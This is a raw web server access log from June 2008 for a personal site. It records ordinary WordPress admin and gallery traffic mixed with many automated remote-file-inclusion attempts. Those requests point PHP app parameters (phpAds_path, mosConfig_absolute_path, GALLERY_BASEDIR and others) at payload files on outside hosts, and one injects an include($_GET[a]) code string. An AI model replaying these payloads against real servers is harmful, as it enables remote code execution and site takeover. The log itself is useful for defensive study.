72.199.235.196 - - [08/Jun/2008:10:16:44 -0700] "GET /blog/wp-admin/edit.php?p=159 HTTP/1.1" 200 12840 "http://dmulk.com/blog/wp-admin/comment.php?action=mac&c=17" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:44 -0700] "GET /blog/wp-admin/js/forms.js?ver=20080317 HTTP/1.1" 200 807 "http://dmulk.com/blog/wp-admin/edit.php?p=159" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:44 -0700] "GET /blog/wp-includes/js/wp-ajax-response.js?ver=20080316 HTTP/1.1" 200 2921 "http://dmulk.com/blog/wp-admin/edit.php?p=159" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:45 -0700] "GET /blog/wp-includes/js/wp-lists.js?ver=20080411 HTTP/1.1" 200 11635 "http://dmulk.com/blog/wp-admin/edit.php?p=159" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:45 -0700] "GET /blog/wp-admin/js/edit-comments.js?ver=20080311 HTTP/1.1" 200 2590 "http://dmulk.com/blog/wp-admin/edit.php?p=159" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:45 -0700] "GET /blog/wp-admin/images/comment-grey-bubble.png HTTP/1.1" 200 158 "http://dmulk.com/blog/wp-admin/edit.php?p=159" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:45 -0700] "GET /blog/wp-admin/images/bubble_bg.gif HTTP/1.1" 200 395 "http://dmulk.com/blog/wp-admin/css/colors-fresh.css?version=2.5.1" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:48 -0700] "GET /blog/wp-admin/post.php?action=edit&post=159 HTTP/1.1" 200 29819 "http://dmulk.com/blog/wp-admin/edit.php?p=159" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:48 -0700] "GET /blog/wp-includes/js/jquery/jquery.dimensions.min.js?ver=1.1.2 HTTP/1.1" 200 2514 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=159" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:48 -0700] "GET /blog/wp-includes/js/jquery/suggest.js?ver=1.1 HTTP/1.1" 200 6459 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=159" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:49 -0700] "GET /blog/wp-includes/js/jquery/ui.tabs.js?ver=3 HTTP/1.1" 200 22382 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=159" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:49 -0700] "GET /blog/wp-admin/js/postbox.js?ver=20080128 HTTP/1.1" 200 549 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=159" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:49 -0700] "GET /blog/wp-admin/js/slug.js?ver=20080208 HTTP/1.1" 200 1741 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=159" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:49 -0700] "GET /blog/wp-admin/js/post.js?ver=20080422 HTTP/1.1" 200 6562 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=159" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:49 -0700] "GET /blog/wp-includes/js/thickbox/thickbox.js?ver=3.1 HTTP/1.1" 200 12079 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=159" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:49 -0700] "GET /blog/wp-admin/js/media-upload.js?ver=20080109 HTTP/1.1" 200 430 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=159" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:49 -0700] "GET /blog/wp-includes/js/jquery/jquery.schedule.js?ver=20 HTTP/1.1" 200 3457 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=159" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:50 -0700] "GET /blog/wp-includes/js/autosave.js?ver=20080424 HTTP/1.1" 200 7433 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=159" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:50 -0700] "GET /blog/wp-admin/images/media-button-video.gif HTTP/1.1" 200 68 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=159" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:50 -0700] "GET /blog/wp-admin/images/media-button-image.gif HTTP/1.1" 200 69 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=159" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:50 -0700] "GET /blog/wp-includes/js/quicktags.js?ver=3958 HTTP/1.1" 200 9648 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=159" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:50 -0700] "GET /blog/wp-admin/images/media-button-music.gif HTTP/1.1" 200 188 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=159" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:50 -0700] "GET /blog/wp-admin/images/media-button-other.gif HTTP/1.1" 200 141 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=159" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:50 -0700] "GET /blog/wp-admin/images/date-button.gif HTTP/1.1" 200 111 "http://dmulk.com/blog/wp-admin/wp-admin.css?version=2.5.1" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:50 -0700] "GET /blog/wp-admin/images/fade-butt.png HTTP/1.1" 200 785 "http://dmulk.com/blog/wp-admin/css/colors-fresh.css?version=2.5.1" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:50 -0700] "GET /blog/wp-admin/images/toggle-arrow.gif HTTP/1.1" 200 71 "http://dmulk.com/blog/wp-admin/css/colors-fresh.css?version=2.5.1" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:50 -0700] "GET /blog/wp-includes/js/thickbox/loadingAnimation.gif HTTP/1.1" 200 5886 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=159" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:56 -0700] "GET /blog/wp-admin/images/tail.gif HTTP/1.1" 200 98 "http://dmulk.com/blog/wp-admin/wp-admin.css?version=2.5.1" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:16:58 -0700] "GET /blog/wp-admin/edit.php HTTP/1.1" 200 13698 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=159" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:17:03 -0700] "GET /blog/wp-admin/post-new.php HTTP/1.1" 200 26041 "http://dmulk.com/blog/wp-admin/edit.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:17:04 -0700] "GET /blog/ HTTP/1.1" 200 17187 "http://dmulk.com/blog/wp-admin/edit.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:17:04 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "http://dmulk.com/blog/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:17:04 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.1" 200 5241 "http://dmulk.com/blog/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:17:04 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.1" 200 4019 "http://dmulk.com/blog/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:17:05 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.1" 200 8888 "http://dmulk.com/blog/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:17:05 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.1" 200 6722 "http://dmulk.com/blog/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:17:05 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://dmulk.com/blog/wp-content/themes/default/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:17:05 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgwide.jpg HTTP/1.1" 200 1014 "http://dmulk.com/blog/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
213.156.192.5 - - [08/Jun/2008:10:17:06 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.137.18 - - [08/Jun/2008:10:17:07 -0700] "GET /logs/access_080106.log//include/bbs.lib.inc.php?site_path=http://www.trobur.no/media/bbs?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:17:11 -0700] "GET /blog/wp-content/uploads/2008/04/img_1120.JPG HTTP/1.1" 200 3072529 "http://dmulk.com/blog/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:17:12 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://dmulk.com/blog/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:17:12 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=3&906 HTTP/1.1" 200 6289 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:17:16 -0700] "GET /blog/wp-content/uploads/2008/04/img_1123.JPG HTTP/1.1" 200 4659669 "http://dmulk.com/blog/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:17:22 -0700] "GET /blog/wp-content/uploads/2008/04/img_1124.JPG HTTP/1.1" 200 3820844 "http://dmulk.com/blog/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:17:24 -0700] "GET /blog/wp-content/uploads/2008/04/img_1131.thumbnail.JPG HTTP/1.1" 200 3726 "http://dmulk.com/blog/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
64.1.215.164 - - [08/Jun/2008:10:17:27 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:17:27 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/loadingAnimationv3.gif HTTP/1.1" 200 5886 "http://dmulk.com/blog/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:17:27 -0700] "GET /blog/wp-content/uploads/2008/04/img_1133.JPG HTTP/1.1" 200 5288628 "http://dmulk.com/blog/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:17:27 -0700] "GET /blog/wp-content/themes/default/images/kubrickheader.jpg HTTP/1.1" 200 7868 "http://dmulk.com/blog/wp-content/themes/default/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:17:28 -0700] "GET /blog/wp-content/themes/default/images/kubrickfooter.jpg HTTP/1.1" 200 2443 "http://dmulk.com/blog/wp-content/themes/default/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:17:30 -0700] "GET /blog/wp-content/uploads/2008/04/img_1129.JPG HTTP/1.1" 200 3839261 "http://dmulk.com/blog/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:17:37 -0700] "GET /blog/wp-content/uploads/2008/04/img_1130.JPG HTTP/1.1" 200 3013085 "http://dmulk.com/blog/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:17:38 -0700] "GET /blog/wp-content/uploads/2008/04/img_1132.JPG HTTP/1.1" 200 3221099 "http://dmulk.com/blog/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:17:40 -0700] "GET /blog/wp-content/uploads/2008/04/img_1135.JPG HTTP/1.1" 200 3097783 "http://dmulk.com/blog/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:17:41 -0700] "GET /blog/wp-content/uploads/2008/04/img_1136.JPG HTTP/1.1" 200 4254533 "http://dmulk.com/blog/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
70.85.201.66 - - [08/Jun/2008:10:17:48 -0700] "GET /logs/access_071219.log/inc/cmses/aedatingCMS.php?dir[inc]=http://trendbiz.ro/user_media/logo/images/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:10:18:11 -0700] "GET /index.php?bg=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 200 16847 "-" "libwww-perl/5.65" "www.dmulk.com"
70.88.226.121 - - [08/Jun/2008:10:18:13 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.88.226.121 - - [08/Jun/2008:10:18:14 -0700] "GET //skin/zero_vote/error.php?dir=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:18:17 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0145.jpg HTTP/1.1" 200 330556 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
77.87.191.61 - - [08/Jun/2008:10:18:19 -0700] "GET /logs/access_080106.log//include/bbs.lib.inc.php?site_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:18:31 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0146.jpg HTTP/1.1" 200 344149 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
92.48.65.154 - - [08/Jun/2008:10:18:42 -0700] "GET /logs/access_080215.log//html&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blackcard.ueuo.com/idscanauto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.65.154 - - [08/Jun/2008:10:18:42 -0700] "GET //html&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blackcard.ueuo.com/idscanauto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.65.154 - - [08/Jun/2008:10:18:43 -0700] "GET /logs//html&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blackcard.ueuo.com/idscanauto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:10:18:45 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0157.jpg HTTP/1.1" 200 311163 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
74.53.197.2 - - [08/Jun/2008:10:18:56 -0700] "GET /logs/access.log/auction/phpAdsNew/view.inc.php?phpAds_path=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:10:18:56 -0700] "GET /auction/phpAdsNew/view.inc.php?phpAds_path=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:10:18:56 -0700] "GET /logs/auction/phpAdsNew/view.inc.php?phpAds_path=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:10:18:56 -0700] "GET /logs/access_080312.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.114.58 - - [08/Jun/2008:10:19:00 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [08/Jun/2008:10:19:00 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.5.10 - - [08/Jun/2008:10:19:02 -0700] "GET //coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
70.86.5.10 - - [08/Jun/2008:10:19:02 -0700] "GET /logs//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:10:19:08 -0700] "GET /logs/access.log//phpAdsNew/view.inc.php?phpAds_path=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:10:19:08 -0700] "GET //phpAdsNew/view.inc.php?phpAds_path=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:10:19:08 -0700] "GET /logs//phpAdsNew/view.inc.php?phpAds_path=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.5.54.135 - - [08/Jun/2008:10:19:09 -0700] "GET /bikes/dteel/2008-05-30/IMG_4639M.JPG HTTP/1.1" 200 98013 "http://www.st-owners.com/forums/showthread.php?t=42196" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2" "www.dmulk.com"
24.5.54.135 - - [08/Jun/2008:10:19:09 -0700] "GET /bikes/dteel/2008-05-30/IMG_4636M.JPG HTTP/1.1" 200 190488 "http://www.st-owners.com/forums/showthread.php?t=42196" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2" "www.dmulk.com"
24.5.54.135 - - [08/Jun/2008:10:19:09 -0700] "GET /bikes/dteel/2008-05-30/IMG_4646M.JPG HTTP/1.1" 200 64790 "http://www.st-owners.com/forums/showthread.php?t=42196" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2" "www.dmulk.com"
24.5.54.135 - - [08/Jun/2008:10:19:09 -0700] "GET /bikes/dteel/2008-05-30/IMG_4644M.JPG HTTP/1.1" 200 108854 "http://www.st-owners.com/forums/showthread.php?t=42196" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2" "www.dmulk.com"
194.208.144.81 - - [08/Jun/2008:10:19:16 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.208.144.81 - - [08/Jun/2008:10:19:16 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.208.144.81 - - [08/Jun/2008:10:19:17 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.65.154 - - [08/Jun/2008:10:19:19 -0700] "GET /logs/?mosConfig_absolute_path=http://blackcard.ueuo.com/idscanauto.txt? HTTP/1.1" 200 50988 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.65.154 - - [08/Jun/2008:10:19:21 -0700] "GET /?mosConfig_absolute_path=http://blackcard.ueuo.com/idscanauto.txt? HTTP/1.1" 200 16845 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:10:19:24 -0700] "GET /logs/access.log//view.inc.php?phpAds_path=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:10:19:24 -0700] "GET //view.inc.php?phpAds_path=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:10:19:24 -0700] "GET /logs//view.inc.php?phpAds_path=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.88.226.121 - - [08/Jun/2008:10:19:49 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [08/Jun/2008:10:20:18 -0700] "GET /logs//errors.php?error=http://gaugele.net//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [08/Jun/2008:10:20:19 -0700] "GET //errors.php?error=http://gaugele.net//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.5.10 - - [08/Jun/2008:10:20:23 -0700] "GET /logs/access_080228.log/dmse/count/full.php//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.geocities.com/dinarisma/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.5.10 - - [08/Jun/2008:10:20:23 -0700] "GET /logs/dmse/count/full.php//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.geocities.com/dinarisma/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.114.58 - - [08/Jun/2008:10:20:31 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
